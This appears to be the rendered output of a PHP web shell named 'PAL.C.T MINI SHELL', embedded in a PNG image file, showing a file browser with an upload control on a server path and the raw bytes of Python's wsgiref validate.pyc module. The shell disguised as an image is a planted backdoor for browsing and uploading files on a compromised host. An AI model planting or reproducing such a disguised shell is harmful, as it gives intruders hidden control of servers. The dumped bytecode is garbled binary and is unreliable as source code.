php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/lib/python2.6/wsgiref/
upload
files >> //usr/lib/python2.6/wsgiref/validate.pyc

Lc@sFdZdgZddkZddkZddklZlZlZlZddk	Z	ei
dZei
dZde
fdYZd	Zd
ZdddYZd
ddYZdddYZdd dYZdd!dYZdZdZdZdZdZdZdZdZdS("s"
Middleware to check for obedience to the WSGI specification.

Some of the things this checks:

* Signature of the application and start_response (including that
  keyword arguments are not used).

* Environment checks:

  - Environment is a dictionary (and not a subclass).

  - That all the required keys are in the environment: REQUEST_METHOD,
    SERVER_NAME, SERVER_PORT, wsgi.version, wsgi.input, wsgi.errors,
    wsgi.multithread, wsgi.multiprocess, wsgi.run_once

  - That HTTP_CONTENT_TYPE and HTTP_CONTENT_LENGTH are not in the
    environment (these headers should appear as CONTENT_LENGTH and
    CONTENT_TYPE).

  - Warns if QUERY_STRING is missing, as the cgi module acts
    unpredictably in that case.

  - That CGI-style variables (that don't contain a .) have
    (non-unicode) string values

  - That wsgi.version is a tuple

  - That wsgi.url_scheme is 'http' or 'https' (@@: is this too
    restrictive?)

  - Warns if the REQUEST_METHOD is not known (@@: probably too
    restrictive).

  - That SCRIPT_NAME and PATH_INFO are empty or start with /

  - That at least one of SCRIPT_NAME or PATH_INFO are set.

  - That CONTENT_LENGTH is a positive integer.

  - That SCRIPT_NAME is not '/' (it should be '', and PATH_INFO should
    be '/').

  - That wsgi.input has the methods read, readline, readlines, and
    __iter__

  - That wsgi.errors has the methods flush, write, writelines

* The status is a string, contains a space, starts with an integer,
  and that integer is in range (> 100).

* That the headers is a list (not a subclass, not another kind of
  sequence).

* That the items of the headers are tuples of strings.

* That there is no 'status' header (that is used in CGI, but not in
  WSGI).

* That the headers don't contain newlines or colons, end in _ or -, or
  contain characters codes below 037.

* That Content-Type is given if there is content (CGI often has a
  default content type, but WSGI does not).

* That no Content-Type is given when there is no content (@@: is this
  too restrictive?)

* That the exc_info argument to start_response is a tuple or None.

* That all calls to the writer are with strings, and no other methods
  on the writer are accessed.

* That wsgi.input is used properly:

  - .read() is called with zero or one argument

  - That it returns a string

  - That readline, readlines, and __iter__ return strings

  - That .close() is not called

  - No other methods are provided

* That wsgi.errors is used properly:

  - .write() and .writelines() is called with a string

  - That .close() is not called, and no other methods are provided.

* The response iterator:

  - That it is not a string (it should be a list of a single string; a
    string will work, but perform horribly).

  - That .next() returns a string

  - That the iterator is not iterated over until start_response has
    been called (that can signal either a server or application
    error).

  - That .close() is called (doesn't raise exception, only prints to
    sys.stderr, because we only know it isn't called when the object
    is garbage collected).
t	validatoriN(tDictTypet
StringTypet	TupleTypetListTypes^[a-zA-Z][a-zA-Z0-9\-_]*$s[\000-\037]tWSGIWarningcBseZdZRS(s:
    Raised in response to WSGI-spec-related warnings
    (t__name__t
__module__t__doc__(((s&/usr/lib/python2.6/wsgiref/validate.pyRzscGs|pt|ndS(N(tAssertionError(tcondtargs((s&/usr/lib/python2.6/wsgiref/validate.pytassert_scsfd}|S(s
    When applied between a WSGI server and a WSGI application, this
    middleware will check for WSGI compliancy on a number of levels.
    This middleware does not modify the request or response in any
    way, but will throw an AssertionError if anything seems off
    (except for a failure to close the application iterator, which
    will be printed to stderr -- there's no way to throw an exception
    at that point).
    cstt|djdt|d|\}t|gfd}t|d|d<t|d|d<||}t|dj	o
|tjdt|t|S(NisTwo arguments requiredsNo keyword arguments allowedcstt|djpt|djd|ft|d|d}|d}t|djo|d}nd}t|t|t||t|idt|S(NiisInvalid number of arguments: %ssNo keyword arguments allowedii(	RtlentNonetcheck_statust
check_headerstcheck_content_typetcheck_exc_infotappendtWriteWrapper(Rtkwtstatustheaderstexc_info(tstart_responsetstart_response_started(s&/usr/lib/python2.6/wsgiref/validate.pytstart_response_wrappers%






s
wsgi.inputswsgi.errorss>The application must return an iterator, if only an empty list(	RR
t
check_environtInputWrappertErrorWrapperRtFalsetcheck_iteratortIteratorWrapper(RRtenvironRtiterator(tapplication(RRs&/usr/lib/python2.6/wsgiref/validate.pytlint_apps

((R$R%((R$s&/usr/lib/python2.6/wsgiref/validate.pyRs)RcBs>eZdZdZdZdZdZdZRS(cCs
||_dS(N(tinput(tselft
wsgi_input((s&/usr/lib/python2.6/wsgiref/validate.pyt__init__scGsHtt|dj|ii|}tt|tdj|S(Nit(RR
R&treadttype(R'Rtv((s&/usr/lib/python2.6/wsgiref/validate.pyR+scCs/|ii}tt|tdj|S(NR*(R&treadlineRR,(R'R-((s&/usr/lib/python2.6/wsgiref/validate.pyR.scGsutt|dj|ii|}tt|tgjx*|D]"}tt|tdjqKW|S(NiR*(RR
R&t	readlinesR,(R'Rtlinestline((s&/usr/lib/python2.6/wsgiref/validate.pyR/s ccs'x |i}|pdS|VqdS(N(R.(R'R1((s&/usr/lib/python2.6/wsgiref/validate.pyt__iter__s
cCstdddS(Nis input.close() must not be called(R(R'((s&/usr/lib/python2.6/wsgiref/validate.pytcloses(RRR)R+R.R/R2R3(((s&/usr/lib/python2.6/wsgiref/validate.pyRs					RcBs5eZdZdZdZdZdZRS(cCs
||_dS(N(terrors(R'twsgi_errors((s&/usr/lib/python2.6/wsgiref/validate.pyR)scCs0tt|tdj|ii|dS(NR*(RR,R4twrite(R'ts((s&/usr/lib/python2.6/wsgiref/validate.pyR6scCs|iidS(N(R4tflush(R'((s&/usr/lib/python2.6/wsgiref/validate.pyR8scCs"x|D]}|i|qWdS(N(R6(R'tseqR1((s&/usr/lib/python2.6/wsgiref/validate.pyt
writelinesscCstdddS(Nis!errors.close() must not be called(R(R'((s&/usr/lib/python2.6/wsgiref/validate.pyR3s(RRR)R6R8R:R3(((s&/usr/lib/python2.6/wsgiref/validate.pyRs
				RcBseZdZdZRS(cCs
||_dS(N(twriter(R'twsgi_writer((s&/usr/lib/python2.6/wsgiref/validate.pyR)scCs-tt|tdj|i|dS(NR*(RR,R;(R'R7((s&/usr/lib/python2.6/wsgiref/validate.pyt__call__s(RRR)R=(((s&/usr/lib/python2.6/wsgiref/validate.pyRs	tPartialIteratorWrappercBseZdZdZRS(cCs
||_dS(N(R#(R't
wsgi_iterator((s&/usr/lib/python2.6/wsgiref/validate.pyR)scCst|idS(N(R!R#R(R'((s&/usr/lib/python2.6/wsgiref/validate.pyR2s(RRR)R2(((s&/usr/lib/python2.6/wsgiref/validate.pyR>s	R!cBs5eZdZdZdZdZdZRS(cCs.||_t||_t|_||_dS(N(toriginal_iteratortiterR#Rtclosedtcheck_start_response(R'R?RC((s&/usr/lib/python2.6/wsgiref/validate.pyR)s		cCs|S(N((R'((s&/usr/lib/python2.6/wsgiref/validate.pyR2	scCsQt|id|ii}|idj	ot|idd|_n|S(NsIterator read after closedsjThe application returns and we started iterating over its body, but start_response has not yet been called(RRBR#tnextRCR(R'R-((s&/usr/lib/python2.6/wsgiref/validate.pyRDs
	
cCs1t|_t|ido|iindS(NR3(tTrueRBthasattrR@R3(R'((s&/usr/lib/python2.6/wsgiref/validate.pyR3s	cCs2|iptiidnt|iddS(Ns/Iterator garbage collected without being closed(RBtsyststderrR6R(R'((s&/usr/lib/python2.6/wsgiref/validate.pyt__del__s

		(RRR)R2RDR3RI(((s&/usr/lib/python2.6/wsgiref/validate.pyR!s
			
	cCstt|tjdt||fxCdddddddd	d
g	D] }t||jd|fqKWx5dd
gD]'}t||jd||dfq|Wd|jotidtnx`|iD]R}d|joqntt||tjd|t||||fqWtt|dtjd|dft|dd+jd|dt	|dt
|d|dd,jotid |dtnt|id!p|d!id"d#|d!t|id$p|d$id"d%|d$|id&o)tt
|d&d'jd(|d&n|id!pt|id$d)nt|id!d"jd*dS(-Ns:Environment is not of the right type: %r (environment: %r)tREQUEST_METHODtSERVER_NAMEtSERVER_PORTswsgi.versions
wsgi.inputswsgi.errorsswsgi.multithreadswsgi.multiprocesss
wsgi.run_onces$Environment missing required key: %rtHTTP_CONTENT_TYPEtHTTP_CONTENT_LENGTHs8Environment should not have the key: %s (use %s instead)itQUERY_STRINGsQUERY_STRING is not in the WSGI environment; the cgi module will use sys.argv when this variable is missing, so application errors are more likelyt.s9Environmental variable %s is not a string: %r (value: %r)s#wsgi.version should be a tuple (%r)swsgi.url_schemethttpthttpsswsgi.url_scheme unknown: %rtGETtHEADtPOSTtOPTIONStPUTtDELETEtTRACEsUnknown REQUEST_METHOD: %rtSCRIPT_NAMEt/s$SCRIPT_NAME doesn't start with /: %rt	PATH_INFOs"PATH_INFO doesn't start with /: %rtCONTENT_LENGTHisInvalid CONTENT_LENGTH: %rsgOne of SCRIPT_NAME or PATH_INFO are required (PATH_INFO should at least be '/' if SCRIPT_NAME is empty)sOSCRIPT_NAME cannot be '/'; it should instead be '', and PATH_INFO should be '/'(RQRR(RSRTRURVRWRXRY(RR,RtwarningstwarnRtkeysRRtcheck_inputtcheck_errorstgett
startswithtintthas_key(R"tkey((s&/usr/lib/python2.6/wsgiref/validate.pyR"sf	



#
cCsAx:ddddgD]&}tt||d||fqWdS(NR+R.R/R2s-wsgi.input (%r) doesn't have the attribute %s(RRF(R(tattr((s&/usr/lib/python2.6/wsgiref/validate.pyRacs
cCs>x7dddgD]&}tt||d||fqWdS(NR8R6R:s.wsgi.errors (%r) doesn't have the attribute %s(RRF(R5Rh((s&/usr/lib/python2.6/wsgiref/validate.pyRbis
cCstt|tjd||iddd}tt|djd|t|}t|djd|t|djp|dd	jotid
|t	ndS(Ns Status must be a string (not %r)iiis)Status codes must be three characters: %ridsStatus code is invalid: %rit sjThe status string (%r) should be a three-digit integer followed by a single space and a status explanation(
RR,RtsplitRR
ReR^R_R(Rtstatus_codet
status_int((s&/usr/lib/python2.6/wsgiref/validate.pyRos$cCsctt|tjd|t|fh}x-|D]%}tt|tjd|t|ftt|dj|\}}t|idjd|d||i<td|jo
d|jd|tti|d	|t|i	d
o|i	dd|t
i|o-td
d|t
i|id
fq6q6WdS(Ns%Headers (%r) must be of type list: %rs1Individual headers (%r) must be of type tuple: %riRsyThe Status header cannot be used; it conflicts with CGI script, and HTTP status is not given through headers (value: %r).s
t:s,Header names may not contain ':' or '\n': %rsBad header name: %rt-t_s#Names may not end in '-' or '_': %ris#Bad header value: %r (bad char: %r)(RR,RRR
tlowerRt	header_retsearchtendswithtbad_header_value_retgroup(Rtheader_namestitemtnametvalue((s&/usr/lib/python2.6/wsgiref/validate.pyR~s.!	cCst|iddd}d}xN|D]F\}}|idjo'||jodStdd|q)q)W||jotdd|ndS(	Niiii0scontent-typesJContent-Type header found in a %s response, which must not return content.s,No Content-Type header found in headers (%s)(ii0(ReRjRRpR(RRtcodetNO_MESSAGE_BODYRxRy((s&/usr/lib/python2.6/wsgiref/validate.pyRs
	
cCs@t|djpt|tdjd|t|fdS(Ns exc_info (%r) is not a tuple: %r((RRR,(R((s&/usr/lib/python2.6/wsgiref/validate.pyRs%cCstt|tddS(NsvYou should not return a string as your application iterator, instead return a single-item list containing that string.(Rt
isinstancetstr(R#((s&/usr/lib/python2.6/wsgiref/validate.pyR s((((((Rt__all__treRGttypesRRRRR^tcompileRqRttWarningRRRRRRR>R!RRaRbRRRRR (((s&/usr/lib/python2.6/wsgiref/validate.pyt<module>ns.	"		7"		!	A						
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`